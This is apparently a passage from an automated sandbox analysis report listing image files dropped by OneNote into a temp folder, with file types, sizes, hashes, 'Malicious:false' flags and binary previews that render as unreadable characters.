                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{CB3D4F96-4C20-4930-BFC4-D097C058EFBF}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{CBFC5560-5EE7-4BFA-B8BF-50F203EBC76A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65998
                                                                                                  Entropy (8bit):7.671031449942883
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                  MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                  SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                  SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                  SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                  C:\Users\user\AppData\Local\Temp\{CC16A537-8E32-4002-8759-CE6D4CFA8C02}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{CC4546A4-9AC2-4159-86F1-3DFFA63261C9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{CC7B0BD4-E601-419B-B41C-DA8C80C2CF67}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{CCF98A49-29DF-459F-AB64-37EF544EAEF2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40884
                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                  C:\Users\user\AppData\Local\Temp\{CD5EA090-6F1A-4B5A-A090-930CB0D94F86}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{CD9811A0-DB5C-4E4D-8C41-612C0DA16EF5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2104
                                                                                                  Entropy (8bit):7.252780160030615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                  MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                  SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                  SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                  SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                  C:\Users\user\AppData\Local\Temp\{CE0A83F2-3733-4612-88AF-E30477682DF8}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):29187
                                                                                                  Entropy (8bit):7.971308326749753
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                  MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                  SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                  SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                  SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                  C:\Users\user\AppData\Local\Temp\{CF945CDA-9EF0-4315-810D-83C0A28DC3ED}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Temp\{CFA18D0C-8E32-4AA6-92C4-BA8892BFEF35}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{D0115B1B-59B7-4928-A6BC-194D649BA679}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{D036B7D5-1A9E-48B4-963B-7B95CD97A9EA}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Temp\{D22C3A60-380D-4ED9-A729-29ED0E9B8CA5}

                                                                                                  Download File
